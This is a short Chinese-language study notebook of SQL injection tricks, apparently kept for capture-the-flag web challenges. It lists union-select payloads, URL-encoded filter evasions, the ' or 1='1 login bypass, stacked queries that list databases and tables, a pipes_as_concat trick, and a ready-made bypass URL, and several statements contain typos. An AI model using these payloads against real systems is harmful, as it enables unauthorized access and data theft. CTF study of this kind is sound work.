在线笔记本
1.两个select之间,要加个 union 连接
例子1:
select * form * union select * form *
例子2:
select * form * union select 1,2,3,4 #
union 拼接的正确用法:
union select 1,2,3,4 #
【其中的1,2,3 都可以替换成SQL语句。如:(select flag form flag) 注意:要记得加上小括号 】
2.SQL空格替换
%09
或
%0a
3.#号代替
%23
4.符号替换
(1)
-- 相当于 注释,后面的语句不会再执行
+ 相当于 空格
【注意:--+ 一般是一起用的,不然注释可能会不能被识别】
(2)
# 相当于 “
5.需要访问数据库的:A库B表
select password from security.users limt 0,3;
【严谨语句如下】
select users.password from security.users limt 0,3;
【语句解释如下】
查询security数据库users表中,从第一条数据开始查询,查3条,数据内容为 密码
【information这个数据库很重要,往往会用到,要记住】
6.正则网站--正则解释
https://regex101.com/
7.被过滤的字词,可以用 ascii码 进行替换
百度就有转化的
8.SQL万能密码
’ or 1=’1
或
账号 'or 1=1 #
密码任意
例题:
select name,pass from tbAdmin where name=’admin’ and pass=’123456’
使用万能密码如下
select name,pass from tbAdmin where name=” or 1=’1’ and pass=’123456’
9.基本操作 爆库-报表-
爆库:
;show databases;
爆数据表
;show tables;
10.当||被禁用。
set sql_mode=pipes_as_concat是将||的作用由or变为拼接字符串
11.当flag被过滤
select $_post['query']||flag from Flag【其中$_post['query']】
等同于
select *,1||flag from Flag
12.登陆账号密码的题目----万能登陆语句---使用hackbar--在load URL输入---在XXXX网址后面挂上
XXXX/check.php?username=admin’or’1’=‘1&password=admin’ or ‘1’='1
1.
2.
3.